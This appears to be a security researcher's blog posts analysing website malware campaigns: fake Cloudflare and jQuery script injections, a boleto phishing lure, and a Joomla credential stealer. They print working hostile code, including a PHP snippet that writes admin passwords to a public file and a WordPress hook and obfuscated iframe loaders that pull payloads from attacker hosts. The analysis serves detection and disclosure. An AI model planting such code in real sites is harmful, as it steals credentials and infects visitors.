Author: Fioravante Souza

Fake cloudflare injection

Seeing malicious campaigns using domain names that resemble big market players is not news anymore. This time I\'ll talk about the new redirects of cloudflare.pw.****

The domain, registered in 2017, has been used as a doorway to other suspicious content since then.

But this time it looks like they want to leverage the SSL adoption rush to hide the infection, since the script is loading content from https://*.contentssl.com.

The attackers are not only infecting files but it seems they are exploiting SQLinjection vulnerabilities to add the following javascript to the database too:

<script id="lg210a" src="https://cloudflare.pw/cdn/statslg30.js" type="text/javascript"></script>

The script id and the remote javascript file called can change. The file can be either statslg[30 or 50].js or statslelivros20.js. All those variations will load similar js. The only difference will be the final host, keeping the contentssl.com domain.

We also found fake Jquery scripts injected on infected sites, so, if you see any of those entries on your site, perform a full check on it.

Aug 8, 2018 by Fioravante Souza

Using Google and Facebook to aid on distribution

Every now and then I check my spam mail box for interesting malware (yes, I receive a lot of phishing messages and alerts that my payments are overdue), but most of the time is more of the same, effortless malware, lousy written messages and not fun to analyze.


Today I was bored (that time of the year that you need to write tons of reports, sorry boss…) and I decided to follow the trail of some of those links on the messages I got. And the first one was a "pleasant" surprise.

Usually I'd go with checking the message origin and writing about how it was sent and what was used to get control of the site, but this time I'll write about other aspect. (If you are wondering, it is a WordPress site with a vulnerable revslider on the site's theme that allowed the attacker to have privileged access to the site).

For those not fluent in Brazilian Portuguese, this message is telling that I have a payment overdue and a new "boleto" (a common barcode payment method in Brazil) is attached. The interesting part is that they are referring to me by my personal email alias and not the full name, however they got my CPF (Brazil's Social Security Number) correct, probably it's is related to some leaked data (not that uncommon here).

Everything on this message is clickable and all them will send you to the same Google shortened URL. Which translates to the Facebook's fbsbx.com domain, which is used by Facebook as the domain where the attachments shared on chats and groups are stored.

It is pretty interesting that they are relying on such services to "host" their files instead of using another hacked site to store the malware. I monitored this file and although the link was set to expire on Fri, 22 Dec 2017 16:15:47 GMT, it was taken down less than 24h after I receive the email scam, probably by a Facebook malware scan process.

Dec 11, 2017 by Fioravante Souza

Joomla password stealer

As we know, one of the main payloads of a successful attack is to maintain access to the compromised server for as long as possible. Today we found this simple but effective password stealer for Joomla.

$fh = fopen("components/com_login/models/login.txt", 'a');
date_default_timezone_set("America/Chicago");
fwrite($fh,date('m/d/Y H:i:s', time())." $_SERVER[REMOTE_ADDR] [$credentials[username]:$credentials[password]]\n");
fclose($fh);

It was injected in /administrator/components/com_login/models/login.php, and the code just captures the $credentials array, username and password to be more specific, and writes to a login.txt file, which was accessible through the internet.

To make things even easier for the attacker, it writes the date and time of the capture on Chicago Timezone (so is the attacker in Chicago?).

Nov 21, 2013 by Fioravante Souza

New juquery.com injection

Today we found a malicious iframe that was being loaded from juquery.com (another fake jquery site). Itconsisted of the following code hidden inside one of the plugins:

  function browser_compability() {  
    if(function_exists('curl_init'))  
            {  
          $url = "httx://www. juquery.com/jquery-1.6.3.min.js";  
              $ch = curl_init();  
                  $timeout = 10;  
               curl_setopt($ch,CURLOPT_URL,$url);  
              curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);  
            curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);  
            $data = curl_exec($ch);  
          curl_close($ch);  
        echo "$data";  
      }  
   }  
   add_action('wp_head', 'browser_compability');

It forces the site to contact juquery.com/jquery-1.6.3.min.js on every page load and display whatever content is provides. Itis currently displaying the following malicious payload (triggered by sitecheck):

<script type="text/javascript">var hs_frf=document.createElement("script");hs_frf.setAttribute("type","text/javascript");
var _0xa6df=["\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x6A\x75\x71\x75\x65\x72..
var hs_fln=_0xa6df[0]+Math[_0xa6df[1]]();hs_frf.setAttribute("src",hs_fln);if (typeof hs_frf!="undefined");
document.getElementsByTagName("head")[0]. appendChild(hs_frf);</script>

Which creates another iframe based on the payload hosted at: httx://www.juquery.com/compability.php?0.09432658250443637:

var _0x2c3c=["\x69\x66\x72\x61\x6D\x65","\x63\x72\x65\x61\x74\x65...
var hs_ifr=document[_0x2c3c[1]](_0x2c3c[0]);hs_ifr[_0x2c3c[2]]=_0x2c3c[3];var hs_len=...
document[_0x2c3c[14]][_0x2c3c[13]] (hs_ifr);

Which also decodes to the iframe loading script:

var hs_ifr = document['createElement']('iframe');
hs_ifr['id'] = '687474703A2F2F6269742E6C792F31626C31736A66';
var hs_len = hs_ifr['id']['length'];
for (var i = 0; i < hs_len; i += 2) {
    hs_ifr['id'] += String["fromCharCode"](parseInt(hs_ifr['id']['substr'](i, 2), 16));
};
hs_ifr["id"] =  hs_ifr['id']['substr'](hs_len);
hs_ifr["style"]['display'] =  'none';
hs_ifr["style"]['width'] = 0;
hs_ifr["style"]['height'] = 0;
hs_ifr["src"] = hs_ifr['id'];
document["body"]["appendChild"] (hs_ifr);

It seems that fake jquery sites are becoming more and more popular and only jquery.com and jquery.org shouldbe trusted.

Jul 8, 2013 by Fioravante Souza